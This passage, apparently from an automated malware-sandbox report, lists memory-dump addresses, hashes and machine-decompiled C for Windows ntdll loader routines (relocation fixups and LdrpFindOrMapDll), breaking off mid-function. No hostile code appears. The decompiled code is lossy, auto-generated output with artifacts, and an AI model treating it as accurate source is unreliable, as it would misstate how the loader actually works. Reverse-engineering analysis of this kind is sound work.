                                                                                                                                                              0x009f0e29
                                                                                                                                                              0x009f0d14
                                                                                                                                                              0x009f0d14
                                                                                                                                                              0x009f0d15
                                                                                                                                                              0x009f0d15
                                                                                                                                                              0x009f0d18
                                                                                                                                                              0x009f0d1b
                                                                                                                                                              0x009f0d1e
                                                                                                                                                              0x009f0d21
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x009f0d23
                                                                                                                                                              0x009f0d24
                                                                                                                                                              0x009f0d29
                                                                                                                                                              0x009f0d2c
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x009f0d2c
                                                                                                                                                              0x009f0d86
                                                                                                                                                              0x009f0d89
                                                                                                                                                              0x009f0d8c
                                                                                                                                                              0x009f0dae
                                                                                                                                                              0x009f0db3
                                                                                                                                                              0x009f0d8e
                                                                                                                                                              0x009f0da6
                                                                                                                                                              0x009f0dab
                                                                                                                                                              0x009f0dbf
                                                                                                                                                              0x009f0dc2
                                                                                                                                                              0x009f0dcb
                                                                                                                                                              0x00000000
                                                                                                                                                              0x009f0dd0
                                                                                                                                                              0x009f0cbe
                                                                                                                                                              0x009f0cc1
                                                                                                                                                              0x009f0cc5
                                                                                                                                                              0x009f0ce7
                                                                                                                                                              0x009f0cec
                                                                                                                                                              0x009f0cc7
                                                                                                                                                              0x009f0cdf
                                                                                                                                                              0x009f0ce4
                                                                                                                                                              0x009f0cf2
                                                                                                                                                              0x009f0cf5
                                                                                                                                                              0x009f0cf8
                                                                                                                                                              0x009f0ca3
                                                                                                                                                              0x009f0ca3
                                                                                                                                                              0x00000000
                                                                                                                                                              0x009f0ca8
                                                                                                                                                              0x009f0c6d
                                                                                                                                                              0x009f0c8f
                                                                                                                                                              0x009f0c94
                                                                                                                                                              0x009f0c6f
                                                                                                                                                              0x009f0c87
                                                                                                                                                              0x009f0c8c
                                                                                                                                                              0x009f0c9a
                                                                                                                                                              0x009f0c9b
                                                                                                                                                              0x009f0c9e
                                                                                                                                                              0x00000000
                                                                                                                                                              0x009f0d77
                                                                                                                                                              0x009f0d77
                                                                                                                                                              0x00000000
                                                                                                                                                              0x009f0d77

                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000006.00000002.2203624657.0000000000930000.00000040.00000001.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                              • Associated: 00000006.00000002.2203612094.0000000000920000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203719368.0000000000A10000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203724457.0000000000A20000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203728871.0000000000A24000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203733148.0000000000A27000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203744469.0000000000A30000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203809294.0000000000A90000.00000040.00000001.sdmp Download File
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: HEAP: $HEAP[%wZ]: $Non-Dedicated free list element %p is out of order$Number of free blocks in arena (%ld) does not match number in the free lists (%ld)$Pseudo Tag %04x size incorrect (%x != %x) %p$RtlFreeHeap$Tag %04x (%ws) size incorrect (%x != %x) %p$Total size of free blocks in arena (%ld) does not match number total in heap header (%ld)$dedicated (%04x) free list element %p is marked busy
                                                                                                                                                              • API String ID: 0-3316276410
                                                                                                                                                              • Opcode ID: c562673a10d6bc4475cda1acb39369251bd10204dc8e289b201cedd2bd5905db
                                                                                                                                                              • Instruction ID: 205a856c24a446943c7f227a80afc44ae766a1ad616f62dfd674c064c96604f4
                                                                                                                                                              • Opcode Fuzzy Hash: c562673a10d6bc4475cda1acb39369251bd10204dc8e289b201cedd2bd5905db
                                                                                                                                                              • Instruction Fuzzy Hash: 70F1E171500249EFDB20DF68C480FBAB7F9FF84714F548499E9859B282C734EA45DBA0
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 009ECFB1, Relevance: 11.5, Strings: 9, Instructions: 266COMMONCrypto
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 57%
                                                                                                                                                              			E009ECFB1(signed int _a4, intOrPtr _a8) {
				unsigned int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				signed short* _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _t82;
				unsigned int _t88;
				intOrPtr _t92;
				unsigned int _t94;
				unsigned int _t96;
				char* _t97;
				void* _t99;
				intOrPtr _t100;
				void* _t104;
				intOrPtr _t105;
				void* _t109;
				intOrPtr _t110;
				void* _t118;
				unsigned int _t120;
				signed char _t130;
				void* _t132;
				signed int _t134;
				char* _t136;
				char* _t138;
				unsigned int _t149;
				intOrPtr _t157;
				unsigned int* _t158;
				signed short* _t159;
				char* _t162;
				void* _t164;
				signed int _t167;
				signed int _t169;
				signed int _t171;
				signed int _t174;
				intOrPtr _t179;
				intOrPtr _t186;
				intOrPtr _t189;
				intOrPtr* _t192;
				unsigned int _t196;
				void* _t208;

				_t130 = _a4;
				_t82 =  *((intOrPtr*)(_t130 + 0x18));
				_t186 =  *((intOrPtr*)(_t130 + 8));
				_t179 =  *((intOrPtr*)(_t130 + 0x24)) -  *((intOrPtr*)(_t82 + 0x28));
				_t132 = _t186 -  *((intOrPtr*)(_t82 + 0x20));
				_t120 = _t179 - _t132;
				_v36 = _t186;
				_v32 = _t179;
				_v8 = _t120;
				_v16 =  *((intOrPtr*)(_t82 + 0xc));
				_v12 =  *((intOrPtr*)(_t82 + 8));
				if(_t179 != 0 || _t132 != 0) {
					_v20 = E009547E4(_t132, _t186);
					if(_v12 == 0) {
						goto L39;
					} else {
						goto L3;
					}
					while(1) {
						L3:
						_t157 = _v16;
						_v12 = _v12 - 1;
						if(_t157 == 0 || _t157 >=  *((intOrPtr*)(_v20 + 0x50))) {
							break;
						}
						_t158 = _t157 + _t186;
						_t88 =  *_t158;
						_t134 = _t88 << 0xc;
						_a4 = _t88 >> 0x14;
						_v28 = _t186 + _t134;
						_t189 = _v16 + 4 + _a4 * 2;
						_t92 =  *((intOrPtr*)(_v20 + 0x50));
						_v16 = _t189;
						if(_t134 >= _t92 || _t189 >= _t92 || (_a4 & 0x00000001) != 0) {
							_push("Invalid fixup information\n");
							_push(0);
							_push(0x55);
							E00993F92();
							break;
						} else {
							_t159 =  &(_t158[1]);
							while(1) {
								_v24 = _t159;
								if(_a4 == 0) {
									break;
								}
								_t94 =  *_t159 & 0x0000ffff;
								_a4 = _a4 - 1;
								_t192 = (_t94 & 0x00000fff) + _v28;
								_t96 = _t94 >> 0xc;
								if(_t96 == 0) {
									_t97 = 0x942926;
									if(_a4 == 0) {
										_t97 = " (padding)";
									}
									E00993F92(0x55, 2, "\t          None%s\n", _t97);
									_t208 = _t208 + 0x10;
									L17:
									_t159 =  &(_v24[1]);
									continue;
								}
								_t99 = _t96 - 1;
								if(_t99 == 0) {
									_t136 = 0x942926;
									if(_t179 == 0) {
										_t136 = "(no change)";
									}
									_t100 =  *_t192;
									_push(_t136);
									_push(_t100 + _t179);
									_push(_t100);
									asm("cdq");
									_push(_t159);
									E00993F92(0x55, 2, "\t%08I64X: VA32 %08X -> %08X %s\n", _t192);
									_t208 = _t208 + 0x20;
									if(_t179 != 0) {
										 *((intOrPtr*)(_t192 + _a8)) =  *((intOrPtr*)(_t192 + _a8)) + _t179;
									}
									goto L17;
								}
								_t104 = _t99 - 1;
								if(_t104 == 0) {
									_t138 = 0x942926;
									if(_t120 == 0) {
										_t138 = "(no change)";
									}
									_t105 =  *_t192;
									_push(_t138);
									_t76 = _t120 + 4; // 0x253a7834
									_push(_t105 + _t192 + _t76);
									_push(_t105 + _t120);
									_push(_t105);
									asm("cdq");
									_push(_t159);
									E00993F92(0x55, 2, "\t%08I64X: PC32 %08X -> %08X (target %p) %s\n", _t192);
									_t208 = _t208 + 0x24;
									if(_t120 != 0) {
										 *((intOrPtr*)(_t192 + _a8)) =  *((intOrPtr*)(_t192 + _a8)) + _t120;
									}
									goto L17;
								}
								_t109 = _t104 - 1;
								if(_t109 == 0) {
									_t162 = 0x942926;
									if(_t179 == 0) {
										_t162 = "(no change)";
									}
									_t110 =  *_t192;
									_push(_t162);
									_t164 = _t110 + _t179;
									asm("adc ecx, ebx");
									_push( *((intOrPtr*)(_t192 + 4)));
									_push(_t164);
									_push( *((intOrPtr*)(_t192 + 4)));
									_push(_t110);
									asm("cdq");
									_push(_t164);
									E00993F92(0x55, 2, "\t%08I64X: VA64 %016I64X -> %016I64X %s\n", _t192);
									_t208 = _t208 + 0x28;
									if(_t179 != 0) {
										 *((intOrPtr*)(_t192 + _a8)) =  *((intOrPtr*)(_t192 + _a8)) + _t179;
										asm("adc [esi+0x4], ebx");
									}
									L16:
									_t120 = _v8;
									goto L17;
								}
								if(_t109 != 1) {
									asm("cdq");
									_push(_t159);
									E00993F92(0x55, 0, "\t%08I64X: Unknown\n", _t192);
									goto L38;
								}
								if(_t120 == 0) {
									goto L17;
								} else {
									_t118 = _a8 + _t192;
									_t196 =  *(_t118 + 0xc);
									_t167 = _t196 >> 0x0000001b & 0x00000001;
									_t169 = _t167 << 0x00000017 |  *(_t118 + 8) & 0x007fffff;
									_t171 = _t169 << 0x00000010 |  *(_t118 + 4) >> 0x00000010;
									_t149 = (((0 << 0x00000020 | _t167) << 0x17 << 0x00000020 | _t169) << 0x10 << 0x00000020 | _t171) << 0x14;
									_t174 = (_t171 << 0x00000014 | _t196 >> 0x00000004 & 0x000fffff) + (_v8 >> 4);
									asm("adc ecx, ebx");
									 *(_t118 + 8) = (_t149 >> 0x00000004 ^  *(_t118 + 8)) & 0x007fffff ^  *(_t118 + 8);
									_t179 = _v32;
									 *(_t118 + 4) = (_t149 << 0x00000020 | _t174) >> 0x14 << 0x00000010 |  *(_t118 + 4) & 0x0000ffff;
									 *(_t118 + 0xc) = ((_t149 >> 0x0000001b & 0x00000001) << 0x00000017 | _t174 & 0x000fffff) << 0x00000004 |  *(_t118 + 0xc) & 0xf700000f;
									goto L16;
								}
							}
							if(_v12 == 0) {
								goto L39;
							}
							_t186 = _v36;
							continue;
						}
					}
					L38:
					return 0xc000007b;
				} else {
					L39:
					return 0;
				}
			}














































                                                                                                                                                              0x009ecfb9
                                                                                                                                                              0x009ecfbc
                                                                                                                                                              0x009ecfc4
                                                                                                                                                              0x009ecfcb
                                                                                                                                                              0x009ecfd0
                                                                                                                                                              0x009ecfd8
                                                                                                                                                              0x009ecfda
                                                                                                                                                              0x009ecfdd
                                                                                                                                                              0x009ecfe0
                                                                                                                                                              0x009ecfe3
                                                                                                                                                              0x009ecfe6
                                                                                                                                                              0x009ecfeb
                                                                                                                                                              0x009ecfff
                                                                                                                                                              0x009ed002
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x009ed008
                                                                                                                                                              0x009ed008
                                                                                                                                                              0x009ed008
                                                                                                                                                              0x009ed00b
                                                                                                                                                              0x009ed010
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x009ed022
                                                                                                                                                              0x009ed024
                                                                                                                                                              0x009ed02b
                                                                                                                                                              0x009ed030
                                                                                                                                                              0x009ed036
                                                                                                                                                              0x009ed03c
                                                                                                                                                              0x009ed043
                                                                                                                                                              0x009ed046
                                                                                                                                                              0x009ed04b
                                                                                                                                                              0x009ed288
                                                                                                                                                              0x009ed28d
                                                                                                                                                              0x009ed28f
                                                                                                                                                              0x009ed291
                                                                                                                                                              0x00000000
                                                                                                                                                              0x009ed063
                                                                                                                                                              0x009ed063
                                                                                                                                                              0x009ed15c
                                                                                                                                                              0x009ed15e
                                                                                                                                                              0x009ed164
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x009ed06b
                                                                                                                                                              0x009ed06e
                                                                                                                                                              0x009ed079
                                                                                                                                                              0x009ed07f
                                                                                                                                                              0x009ed081
                                                                                                                                                              0x009ed24b
                                                                                                                                                              0x009ed253
                                                                                                                                                              0x009ed255
                                                                                                                                                              0x009ed255
                                                                                                                                                              0x009ed264
                                                                                                                                                              0x009ed269
                                                                                                                                                              0x009ed157
                                                                                                                                                              0x009ed15b
                                                                                                                                                              0x00000000
                                                                                                                                                              0x009ed15b
                                                                                                                                                              0x009ed087
                                                                                                                                                              0x009ed088
                                                                                                                                                              0x009ed20d
                                                                                                                                                              0x009ed212
                                                                                                                                                              0x009ed214
                                                                                                                                                              0x009ed214
                                                                                                                                                              0x009ed219
                                                                                                                                                              0x009ed21b
                                                                                                                                                              0x009ed21f
                                                                                                                                                              0x009ed220
                                                                                                                                                              0x009ed223
                                                                                                                                                              0x009ed224
                                                                                                                                                              0x009ed22f
                                                                                                                                                              0x009ed234
                                                                                                                                                              0x009ed239
                                                                                                                                                              0x009ed244
                                                                                                                                                              0x009ed244
                                                                                                                                                              0x00000000
                                                                                                                                                              0x009ed239
                                                                                                                                                              0x009ed08e
                                                                                                                                                              0x009ed08f
                                                                                                                                                              0x009ed1c5
                                                                                                                                                              0x009ed1ca
                                                                                                                                                              0x009ed1cc
                                                                                                                                                              0x009ed1cc
                                                                                                                                                              0x009ed1d1
                                                                                                                                                              0x009ed1d3
                                                                                                                                                              0x009ed1d7
                                                                                                                                                              0x009ed1db
                                                                                                                                                              0x009ed1df
                                                                                                                                                              0x009ed1e0
                                                                                                                                                              0x009ed1e3
                                                                                                                                                              0x009ed1e4
                                                                                                                                                              0x009ed1ef
                                                                                                                                                              0x009ed1f4
                                                                                                                                                              0x009ed1f9
                                                                                                                                                              0x009ed204
                                                                                                                                                              0x009ed204
                                                                                                                                                              0x00000000
                                                                                                                                                              0x009ed1f9
                                                                                                                                                              0x009ed095
                                                                                                                                                              0x009ed096
                                                                                                                                                              0x009ed17b
                                                                                                                                                              0x009ed182
                                                                                                                                                              0x009ed184
                                                                                                                                                              0x009ed184
                                                                                                                                                              0x009ed189
                                                                                                                                                              0x009ed18e
                                                                                                                                                              0x009ed193
                                                                                                                                                              0x009ed195
                                                                                                                                                              0x009ed197
                                                                                                                                                              0x009ed198
                                                                                                                                                              0x009ed199
                                                                                                                                                              0x009ed19c
                                                                                                                                                              0x009ed19f
                                                                                                                                                              0x009ed1a0
                                                                                                                                                              0x009ed1ab
                                                                                                                                                              0x009ed1b0
                                                                                                                                                              0x009ed1b5
                                                                                                                                                              0x009ed1bc
                                                                                                                                                              0x009ed1be
                                                                                                                                                              0x009ed1be
                                                                                                                                                              0x009ed154
                                                                                                                                                              0x009ed154
                                                                                                                                                              0x00000000
                                                                                                                                                              0x009ed154
                                                                                                                                                              0x009ed09d
                                                                                                                                                              0x009ed273
                                                                                                                                                              0x009ed274
                                                                                                                                                              0x009ed27e
                                                                                                                                                              0x00000000
                                                                                                                                                              0x009ed283
                                                                                                                                                              0x009ed0a5
                                                                                                                                                              0x00000000
                                                                                                                                                              0x009ed0ab
                                                                                                                                                              0x009ed0ae
                                                                                                                                                              0x009ed0b0
                                                                                                                                                              0x009ed0bb
                                                                                                                                                              0x009ed0cf
                                                                                                                                                              0x009ed0e2
                                                                                                                                                              0x009ed0ed
                                                                                                                                                              0x009ed101
                                                                                                                                                              0x009ed103
                                                                                                                                                              0x009ed119
                                                                                                                                                              0x009ed12c
                                                                                                                                                              0x009ed14e
                                                                                                                                                              0x009ed151
                                                                                                                                                              0x00000000
                                                                                                                                                              0x009ed151
                                                                                                                                                              0x009ed0a5
                                                                                                                                                              0x009ed16d
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x009ed173
                                                                                                                                                              0x00000000
                                                                                                                                                              0x009ed173
                                                                                                                                                              0x009ed04b
                                                                                                                                                              0x009ed299
                                                                                                                                                              0x00000000
                                                                                                                                                              0x009ed2a0
                                                                                                                                                              0x009ed2a0
                                                                                                                                                              0x00000000
                                                                                                                                                              0x009ed2a0

                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000006.00000002.2203624657.0000000000930000.00000040.00000001.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                              • Associated: 00000006.00000002.2203612094.0000000000920000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203719368.0000000000A10000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203724457.0000000000A20000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203728871.0000000000A24000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203733148.0000000000A27000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203744469.0000000000A30000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203809294.0000000000A90000.00000040.00000001.sdmp Download File
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: None%s$%08I64X: PC32 %08X -> %08X (target %p) %s$%08I64X: Unknown$%08I64X: VA32 %08X -> %08X %s$%08I64X: VA64 %016I64X -> %016I64X %s$ (padding)$(no change)$Invalid fixup information$p&T
                                                                                                                                                              • API String ID: 0-2528324251
                                                                                                                                                              • Opcode ID: 864c69999f864a5d59308be8cd8b677bfbab470fe0d96087e0b057da54d6e619
                                                                                                                                                              • Instruction ID: 4b941b59805d521254f56e51f3c4fb2cb12a38c506f50d135a5d82cb83f397b2
                                                                                                                                                              • Opcode Fuzzy Hash: 864c69999f864a5d59308be8cd8b677bfbab470fe0d96087e0b057da54d6e619
                                                                                                                                                              • Instruction Fuzzy Hash: E891E5B2E00615AFEF18CF49C981E6973E9EF84311F19C16DE919AB381D674DD41CB90
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 0095E6C1, Relevance: 10.6, Strings: 8, Instructions: 626COMMONCrypto
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 86%
                                                                                                                                                              			E0095E6C1(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				signed int _t254;
				signed int _t257;
				signed int _t258;
				signed int _t260;
				signed int _t261;
				signed int _t263;
				signed int _t288;
				signed int _t290;
				signed int _t299;
				intOrPtr _t300;
				intOrPtr _t303;
				intOrPtr _t304;
				intOrPtr* _t319;
				intOrPtr* _t320;
				intOrPtr* _t321;
				intOrPtr _t324;
				signed int _t328;
				intOrPtr _t331;
				intOrPtr* _t332;
				signed short _t333;
				signed int _t336;
				intOrPtr _t347;
				signed int _t348;
				intOrPtr _t355;
				signed int _t376;
				signed int _t378;
				signed int _t380;
				signed short* _t388;
				signed short* _t390;
				signed int _t391;
				signed int _t401;
				intOrPtr _t403;
				intOrPtr* _t405;
				signed int _t406;
				intOrPtr _t407;
				signed int _t410;
				signed int _t411;
				intOrPtr* _t414;
				intOrPtr* _t416;
				signed int _t417;
				intOrPtr* _t418;
				void* _t419;
				void* _t421;
				void* _t422;

				_push(0xb4);
				_push(0x94be58);
				E0094DF5C(__ebx, __edi, __esi);
				_t254 =  *0x94f78c; // 0x8
				_t416 =  *((intOrPtr*)(_t421 + 0xc));
				if(( *0xa277a0 & (_t254 | 0x00000001)) != 0) {
					_push(_t416);
					E009BF970(__ebx, "d:\\w7rtm\\minkernel\\ntdll\\ldrfind.c", 0xe7, "LdrpFindOrMapDll", 3, "DLL name: %wZ DLL path: %wZ\n",  *(_t421 + 8));
					_t422 = _t422 + 0x1c;
				}
				_t257 =  *0xa277a0; // 0x0
				if(( *0x94f790 & _t257) != 0) {
					asm("int3");
				}
				_t410 = 0;
				 *(_t421 - 0x24) = 0;
				 *((intOrPtr*)(_t421 - 0x5c)) = 0;
				 *((intOrPtr*)(_t421 - 0x4c)) = 0;
				 *(_t421 - 0x28) = 0;
				 *(_t421 + 0xf) = 0;
				_t401 = 0;
				if( *(_t421 + 0x18) != 0) {
					_t258 = E0094FA50(0,  *(_t421 + 8),  *((intOrPtr*)(_t421 + 0x1c)));
					__eflags = _t258;
					if(_t258 != 0) {
						goto L13;
					}
					_t411 = E00961A18(_t406,  *(_t421 + 8), _t421 - 0x3c);
					__eflags = _t411;
					if(_t411 < 0) {
						goto L14;
					}
					_t411 = E00961AC6(_t402,  *(_t421 + 8), _t421 - 0x48, _t421 - 0x34);
					__eflags = _t411;
					if(_t411 < 0) {
						E0094E1C6(_t421 - 0x3c);
						goto L14;
					}
					 *(_t421 - 0x24) = 0x10000000;
					goto L84;
				} else {
					_t388 =  *(_t421 + 8);
					_t402 = _t388[2];
					_t390 = ( *_t388 & 0x0000ffff) + _t402 - 2;
					while(_t390 >= _t402) {
						_t406 =  *_t390 & 0x0000ffff;
						if(_t406 == 0x5c || _t406 == 0x2f) {
							 *(_t421 + 0xf) = 1;
							break;
						} else {
							_t390 = _t390;
							continue;
						}
					}
					__eflags =  *(_t421 + 0xf);
					if( *(_t421 + 0xf) == 0) {
						_t391 = E0094FA50( *(_t421 + 8), _t410,  *((intOrPtr*)(_t421 + 0x1c)));
						__eflags = _t391;
						if(_t391 != 0) {
							L13:
							 *((char*)( *((intOrPtr*)(_t421 + 0x20)))) = 0;
							_t411 = 0;
							__eflags = 0;
							L14:
							_t260 =  *0x94f798; // 0x8
							_t261 = _t260 | 0x00000001;
							__eflags =  *0xa277a0 & _t261;
							if(( *0xa277a0 & _t261) != 0) {
								E009BF970(_t401, "d:\\w7rtm\\minkernel\\ntdll\\ldrfind.c", 0x2d9, "LdrpFindOrMapDll", 4, "Status: 0x%08lx\n", _t411);
							}
							_t263 =  *0xa277a0; // 0x0
							__eflags =  *0x94f79c & _t263;
							if(( *0x94f79c & _t263) != 0) {
								asm("int3");
							}
							return E0094DFA1(_t411);
						}
						_t411 = E0095FBDF(_t410,  *(_t421 + 8), 0xf, _t421 - 0x48, _t421 - 0x34, _t421 - 0x2c);
						__eflags = _t411;
						if(_t411 < 0) {
							__eflags = _t411 - 0xc0000135;
							if(_t411 == 0xc0000135) {
								_t410 = 0;
								goto L10;
							}
							goto L14;
						}
						L19:
						_t290 = E0094E893(_t421 - 0x48, 0x95ed64, 1);
						__eflags = _t290;
						 *((char*)(_t421 + 0x10)) = _t290 & 0xffffff00 | _t290 != 0x00000000;
						_t411 = E0095BC87(_t406, _t416,  *((intOrPtr*)(_t421 - 0x2c)),  *((intOrPtr*)(_t421 - 0x44)),  *((intOrPtr*)(_t421 - 0x30)),  *((intOrPtr*)(_t421 + 0x10)), _t421 - 0x1c, _t421 - 0x54);
						_t401 = 0;
						__eflags = _t411;
						if(__eflags < 0) {
							L29:
							E0093F9F0( *((intOrPtr*)(_t421 - 0x2c)));
							__eflags =  *(_t421 - 0x28) - _t401;
							if( *(_t421 - 0x28) == _t401) {
								L32:
								E0094E025(_t402,  *0xa20104, 0,  *((intOrPtr*)(_t421 - 0x30)));
								goto L14;
							}
							L30:
							E0093F9F0( *(_t421 - 0x28));
							L31:
							E0094E1C6(_t421 - 0x3c);
							goto L32;
						}
						 *(_t421 + 0x18) = _t411;
						_push(_t421 - 0x20);
						_push(0);
						_push( *((intOrPtr*)(_t421 - 0x54)));
						_push( *((intOrPtr*)(_t421 - 0x1c)));
						_push(0);
						_t411 = E0094F535(_t411, _t416, __eflags);
						__eflags = _t411;
						if(_t411 < 0) {
							L28:
							_push( *((intOrPtr*)(_t421 - 0x1c)));
							E0093FC90(0xffffffff);
							goto L29;
						}
						__eflags =  *(_t421 + 0xf);
						if( *(_t421 + 0xf) != 0) {
							_t299 = E00961603( *((intOrPtr*)(_t421 - 0x1c)),  *((intOrPtr*)(_t421 - 0x20)),  *((intOrPtr*)(_t421 + 0x1c)));
							__eflags = _t299;
							if(_t299 == 0) {
								goto L22;
							}
							 *((char*)( *((intOrPtr*)(_t421 + 0x20)))) = 0;
							_t411 = 0;
							goto L28;
						}
						L22:
						__eflags =  *0xa200d8 - 0x2000;
						if( *0xa200d8 == 0x2000) {
							_t402 = 0x10b;
							_t300 =  *((intOrPtr*)(_t421 - 0x20));
							__eflags =  *((intOrPtr*)(_t300 + 0x18)) - 0x10b;
							if( *((intOrPtr*)(_t300 + 0x18)) != 0x10b) {
								goto L23;
							}
							__eflags =  *((intOrPtr*)(_t300 + 0x38)) - 0x1000;
							if( *((intOrPtr*)(_t300 + 0x38)) != 0x1000) {
								goto L23;
							}
							_push(_t401);
							_push(0x30);
							_push(_t421 - 0xc4);
							_push(1);
							E00940060( *((intOrPtr*)(_t421 - 0x2c)));
							__eflags =  *(_t421 - 0xa1) & 0x00000008;
							if(__eflags == 0) {
								goto L23;
							}
							 *(_t421 - 4) = _t401;
							_t411 = E009C5F1D(0x10b, _t406, __eflags, _t421 - 0x34,  *((intOrPtr*)(_t421 - 0x20)),  *((intOrPtr*)(_t421 - 0x1c)));
							 *(_t421 - 0x70) = _t411;
							 *(_t421 - 4) = 0xfffffffe;
							__eflags = _t411 - _t401;
							if(_t411 >= _t401) {
								goto L23;
							} else {
								goto L28;
							}
						}
						L23:
						_t417 = E0094F5E6( *((intOrPtr*)(_t421 - 0x1c)), 1, 0xe, _t421 - 0x8c);
						 *(_t421 - 0x58) = _t417;
						__eflags = _t417 - _t401;
						if(_t417 != _t401) {
							__eflags =  *(_t417 + 0x10) & 0x00000001;
							if(( *(_t417 + 0x10) & 0x00000001) == 0) {
								goto L24;
							}
							_t380 = E0097855C(_t401, _t411, _t421 - 0x1c,  *((intOrPtr*)(_t421 - 0x30)));
							_t411 = _t380;
							__eflags = _t411 - _t401;
							if(_t411 < _t401) {
								goto L28;
							} else {
								 *(_t421 - 0x24) =  *(_t421 - 0x24) | 0x01400000;
								 *(_t421 + 0x18) = _t380;
								goto L24;
							}
							L73:
							_t336 =  *(_t421 - 0x58);
							__eflags =  *(_t336 + 0x10) & 0x00000001;
							if(( *(_t336 + 0x10) & 0x00000001) != 0) {
								L45:
								_t411 = 0;
								E0095EF95(_t418, 1, 0);
								E0093F9F0( *((intOrPtr*)(_t421 - 0x2c)));
								__eflags =  *(_t421 - 0x28);
								if( *(_t421 - 0x28) != 0) {
									E0093F9F0( *(_t421 - 0x28));
									E0094E1C6(_t421 - 0x3c);
								}
								 *((intOrPtr*)( *((intOrPtr*)(_t421 + 0x1c)))) = _t418;
								 *((char*)( *((intOrPtr*)(_t421 + 0x20)))) = 1;
								goto L14;
							}
							_t411 = E0097855C(_t401, _t414, _t421 - 0x1c,  *((intOrPtr*)(_t421 - 0x30)));
							__eflags = _t411;
							if(_t411 < 0) {
								E0094E025(_t402,  *0xa20104, 0, _t418);
								_t401 = 0;
								__eflags = 0;
								L121:
								__eflags =  *(_t421 - 0x24) & 0x00400000;
								if(__eflags != 0) {
									E009C0010(_t401, _t411, _t418, __eflags,  *((intOrPtr*)(_t421 - 0x1c)));
								}
								goto L28;
							}
							 *(_t418 + 0x34) =  *(_t418 + 0x34) | 0x00000004;
							goto L45;
						}
						L24:
						__eflags =  *(_t421 + 0x18) - 0x4000000e;
						if(__eflags != 0) {
							__eflags =  *(_t421 + 0x14) & 0x00800000;
							if(( *(_t421 + 0x14) & 0x00800000) == 0) {
								L117:
								_t303 =  *((intOrPtr*)(_t421 - 0x20));
								L33:
								_t402 = 0x2000;
								__eflags =  *(_t303 + 0x16) & 0x00002000;
								if(( *(_t303 + 0x16) & 0x00002000) == 0) {
									L35:
									_t304 =  *0xa20058; // 0x0
									_t418 = E0094E0C6( *0xa20104, _t304 + 0x40000, 0x78);
									__eflags = _t418 - _t401;
									if(_t418 == _t401) {
										_t411 = 0xc0000017;
										goto L121;
									} else {
										 *((intOrPtr*)(_t418 + 0x18)) =  *((intOrPtr*)(_t421 - 0x1c));
										__eflags =  *(_t421 - 0x24) & 0x00000004;
										if(( *(_t421 - 0x24) & 0x00000004) == 0) {
											 *(_t418 + 0x1c) = _t401;
										} else {
											_t347 =  *((intOrPtr*)(_t421 - 0x20));
											__eflags =  *((intOrPtr*)(_t347 + 0x28)) - _t401;
											if( *((intOrPtr*)(_t347 + 0x28)) == _t401) {
												_t348 = 0;
											} else {
												_t348 =  *((intOrPtr*)(_t347 + 0x28)) +  *((intOrPtr*)(_t421 - 0x1c));
												__eflags = _t348;
											}
											 *(_t418 + 0x1c) = _t348;
										}
										 *((intOrPtr*)(_t418 + 0x20)) =  *((intOrPtr*)( *((intOrPtr*)(_t421 - 0x20)) + 0x50));
										 *((intOrPtr*)(_t418 + 0x24)) =  *(_t421 - 0x34);
										 *((intOrPtr*)(_t418 + 0x28)) =  *((intOrPtr*)(_t421 - 0x30));
										_t91 = _t418 + 0x2c; // 0x2c
										_t401 = _t91;
										 *_t401 =  *((intOrPtr*)(_t421 - 0x48));
										 *((intOrPtr*)(_t401 + 4)) =  *((intOrPtr*)(_t421 - 0x44));
										 *(_t418 + 0x34) =  *(_t421 - 0x24);
										 *((short*)(_t418 + 0x38)) = 0;
										 *((short*)(_t418 + 0x3a)) = 0;
										 *((intOrPtr*)(_t418 + 0x44)) =  *((intOrPtr*)( *((intOrPtr*)(_t421 - 0x20)) + 8));
										__eflags = 0;
										 *((intOrPtr*)(_t418 + 0x48)) = 0;
										 *((intOrPtr*)(_t418 + 0x4c)) = 0;
										_t104 = _t418 + 0x50; // 0x50
										_t319 = _t104;
										 *((intOrPtr*)(_t319 + 4)) = _t319;
										 *_t319 = _t319;
										_t106 = _t418 + 0x58; // 0x58
